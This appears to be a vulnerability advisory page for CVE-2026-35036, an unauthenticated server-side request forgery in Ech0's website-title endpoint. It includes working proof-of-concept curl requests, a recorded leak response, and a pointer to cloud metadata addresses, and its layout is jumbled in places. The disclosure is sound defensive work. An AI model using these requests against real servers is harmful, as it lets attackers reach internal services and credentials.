Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-35036 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
Ech0 implements link preview (editor fetches a page title) through GET /api/website/title. That is legitimate product behavior, but the implementation is unsafe: the route is unauthenticated, accepts a fully attacker-controlled URL, performs a server-side GET, reads the entire response body into memory (io.ReadAll). There is no host allowlist, no SSRF filter, and InsecureSkipVerify: true on the outbound client.
Attacker outcome : Anyone who can reach the instance can force the Ech0 server to open HTTP/HTTPS URLs of their choice as seen from the server’s network position (Docker bridge, VPC, localhost from the process view).
Go’s default http.Client follows redirects (unless disabled). Redirect chains can move the server-side request from an allowed-looking host to an internal target; the code does not disable this in SendRequest.
Ech0 codebase:
internal/handler/common/common.go
Handles the /api/website/title endpoint and accepts user-controlled URL input.
internal/service/common/common.go
Processes the request and invokes the outbound HTTP fetch (GetWebsiteTitle).
internal/util/http/http.go
Performs the HTTP request (SendRequest) with the following insecure configurations:
InsecureSkipVerify: trueEnvironment: Ech0 listening on http://127.0.0.1:6277 (e.g. Docker image ). No cookies or header.
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
sn0wl1n/ech0:latestAuthorizationStep 1 — baseline: unauthenticated server-side fetch (public URL):
curl.exe -sS -m 20 "http://127.0.0.1:6277/api/website/title?website_url=https://example.com"
Observed result (verified): HTTP 200, JSON with code: 1 and data Example Domain — proves the Ech0 process performed an outbound GET without any client auth.
Step 2 — impact: host-bound page + recorded leak (repo PoC file)
Committed PoC page: poc_ssrf_proof.html
poc file directory, listen on 0.0.0.0 (port 9999):python -m http.server 9999 --bind 0.0.0.0
host.docker.internal:curl.exe -sS -m 20 "http://127.0.0.1:6277/api/website/title?website_url=http://host.docker.internal:9999/poc_ssrf_proof.html"
Recorded response (verified this workspace, Ech0 4.2.2 in Docker):
{"code":1,"msg":"获取网站标题成功","data":"ECH0_SSRF_POC_LEAK_2026"}
Python server log: GET /poc_ssrf_proof.html → 200 (proves the server/container pulled the page from your host).
Leak channel: the backend reads the full HTML body before parsing (see io.ReadAll in SendRequest).
io.ReadAll); only the title string is returned. Combined with default HTTP redirect following (standard http.Client behavior; not disabled here), the effective request graph is larger than a single URL.InsecureSkipVerify: true means misissued or intercepted TLS to internal HTTPS services is still accepted from the server’s perspective.169.254.169.254-class endpoints are in scope for the same code path; treat as *high.InsecureSkipVerify; use normal TLS verification.